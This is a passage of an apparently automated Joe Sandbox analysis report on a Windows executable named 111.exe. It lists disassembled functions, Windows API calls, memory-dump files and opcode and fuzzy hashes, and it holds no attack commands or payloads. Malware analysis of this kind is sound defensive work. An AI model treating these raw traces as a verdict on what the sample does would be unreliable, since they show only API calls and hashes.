                                                                                                                                • Part of subcall function 004059FA: CloseHandle.KERNEL32(?), ref: 00405A30
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                                                • Part of subcall function 004068B1: WaitForSingleObject.KERNEL32(?,00000064), ref: 004068C2
                                                                                                                                • Part of subcall function 004068B1: GetExitCodeProcess.KERNEL32(?,?), ref: 004068E4
                                                                                                                                • Part of subcall function 00406358: wsprintfW.USER32 ref: 00406365
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2972824698-0
                                                                                                                              • Opcode ID: 5964da7f973718390334a5d1285ca24234599016c86872e96086f6d140a0f19c
                                                                                                                              • Instruction ID: 70f87f17d48a981753e2349e7fd5e29e0bd5cf5a9d75e43b79cc9d2baa006ef6
                                                                                                                              • Opcode Fuzzy Hash: 5964da7f973718390334a5d1285ca24234599016c86872e96086f6d140a0f19c
                                                                                                                              • Instruction Fuzzy Hash: 05F09632905111EBCB10AFA589849DE72B4DF00314B25453BE552B31D0C7BC0D419A6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 00404DD4 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490windowmemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DEB
                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DF8
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E44
                                                                                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E5B
                                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053ED), ref: 00404E75
                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E89
                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E9D
                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EB2
                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EBE
                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404ED0
                                                                                                                              • DeleteObject.GDI32(00000110), ref: 00404ED5
                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404F00
                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404F0C
                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FA7
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FD7
                                                                                                                                • Part of subcall function 0040439C: SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FEB
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00405019
                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405027
                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00405037
                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405138
                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040519A
                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004051AF
                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051D3
                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051F6
                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040520B
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0040521B
                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405294
                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040533D
                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040534C
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405376
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004053C4
                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053CF
                                                                                                                              • ShowWindow.USER32(00000000), ref: 004053D6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                              • String ID: $M$N
                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                              • Opcode ID: 7b7957ea1338d254e874131d8d2f31ce821a0993c9efe37939129592d3677914
                                                                                                                              • Instruction ID: d580a4fcaa5169941c29ca465f5867fc490570c71858173d192e260bc12e7e27
                                                                                                                              • Opcode Fuzzy Hash: 7b7957ea1338d254e874131d8d2f31ce821a0993c9efe37939129592d3677914
                                                                                                                              • Instruction Fuzzy Hash: 9C127A70D00609EFDB20DFA5CD45AAEBBB5FB84314F10817AEA10BA2E1C7798941DF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404526 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045C4
                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D8
                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045F5
                                                                                                                              • GetSysColor.USER32(?), ref: 00404606
                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404614
                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404622
                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00404627
                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404634
                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404649
                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004046A2
                                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A9
                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046D4
                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404717
                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404725
                                                                                                                              • SetCursor.USER32(00000000), ref: 00404728
                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404741
                                                                                                                              • SetCursor.USER32(00000000), ref: 00404744
                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404773
                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404785
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                              • String ID: N$Remove folder:
                                                                                                                              • API String ID: 3103080414-3051863454
                                                                                                                              • Opcode ID: 3e7f1d81aaa2c81caad56aadef940d4d94f2f382e64dbbb27fd2036abddb4608
                                                                                                                              • Instruction ID: bc177dfd6b6b6103f733ab6784bbaef7ca361af311f51bfa08924dfc74b84e38
                                                                                                                              • Opcode Fuzzy Hash: 3e7f1d81aaa2c81caad56aadef940d4d94f2f382e64dbbb27fd2036abddb4608
                                                                                                                              • Instruction Fuzzy Hash: 79618EB1A00209FFDB109F60DD85AAA7B69FB85314F00843AFA15B72D1D778AD51CF98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                              • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                              • String ID: F
                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                              • Opcode ID: b27a2b551f63a02a5ae57bcc50d46a19120317da1eaca0d31fe5953092f3d4ab
                                                                                                                              • Instruction ID: eaab19ccb9cda740c31967da28403833e1322962c0e6ee158e4036cb66a51054
                                                                                                                              • Opcode Fuzzy Hash: b27a2b551f63a02a5ae57bcc50d46a19120317da1eaca0d31fe5953092f3d4ab
                                                                                                                              • Instruction Fuzzy Hash: ED418B71800209AFCF058FA5CE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040605D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061F8,?,?), ref: 00406098
                                                                                                                              • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004060A1
                                                                                                                                • Part of subcall function 00405E6C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                                • Part of subcall function 00405E6C: lstrlenA.KERNEL32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EAE
                                                                                                                              • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004060BE
                                                                                                                              • wsprintfA.USER32 ref: 004060DC
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00406117
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406126
                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040615E
                                                                                                                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004061B4
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004061C5
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061CC
                                                                                                                                • Part of subcall function 00405F07: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\Public\111.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
                                                                                                                                • Part of subcall function 00405F07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                                              • API String ID: 2171350718-461813615
                                                                                                                              • Opcode ID: 9e81a52cf72013a233c10081a1d34339af37048498d3be196f71e588f014a248
                                                                                                                              • Instruction ID: d46549913b6b20842cf1787bef5cc60fb31ae9cbf3b8bb231415db86ef2d3bba
                                                                                                                              • Opcode Fuzzy Hash: 9e81a52cf72013a233c10081a1d34339af37048498d3be196f71e588f014a248
                                                                                                                              • Instruction Fuzzy Hash: 9D3135712017157BD2206B218D48F6B3A5CDF45754F15003AFE82FA2C3DA3CE9218ABD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004043CE Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043EB
                                                                                                                              • GetSysColor.USER32(00000000), ref: 00404429
                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404435
                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404441
                                                                                                                              • GetSysColor.USER32(?), ref: 00404454
                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00404464
                                                                                                                              • DeleteObject.GDI32(?), ref: 0040447E
                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404488
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2320649405-0
                                                                                                                              • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                                              • Instruction ID: dd0feedb065fecc26b382c70af4fe1a3d395924493241b124500faa7aa9dc668
                                                                                                                              • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                                              • Instruction Fuzzy Hash: 7C2174B15007059BCB30DF78DA08B5BBBF8AF81714B05892EE992B26E1D734E904DB58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004026E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                                                                                • Part of subcall function 00405FE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FFE
                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                              • String ID: 9
                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                              • Opcode ID: 939078a54e4475671e6551d3fd19772fabc7f31a6bf9158e4a480f344115c940
                                                                                                                              • Instruction ID: fc85df120a24998764995467ff6edc9a451c04e372c05a6abf1f77cf4653f2d7
                                                                                                                              • Opcode Fuzzy Hash: 939078a54e4475671e6551d3fd19772fabc7f31a6bf9158e4a480f344115c940
                                                                                                                              • Instruction Fuzzy Hash: 5C51F975D00219ABDF20DF95CA89AAEBB79FF04344F10817BE501B62D0E7B49D828B58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004066C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,00440000,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406723
                                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406732
                                                                                                                              • CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,00440000,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406737
                                                                                                                              • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00440000,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 0040674A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                              • API String ID: 589700163-1201062745
                                                                                                                              • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                                              • Instruction ID: 9627fccf098e727a5900f08bdddf05a21b4f43d755832024a56349c67539c63f
                                                                                                                              • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                                              • Instruction Fuzzy Hash: F2110D1580061295DB303B548C84A7B62F8EF5879CF52843FED96732C0E77D8C9286BD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404D22 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D3D
                                                                                                                              • GetMessagePos.USER32 ref: 00404D45
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D5F
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D71
                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D97
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
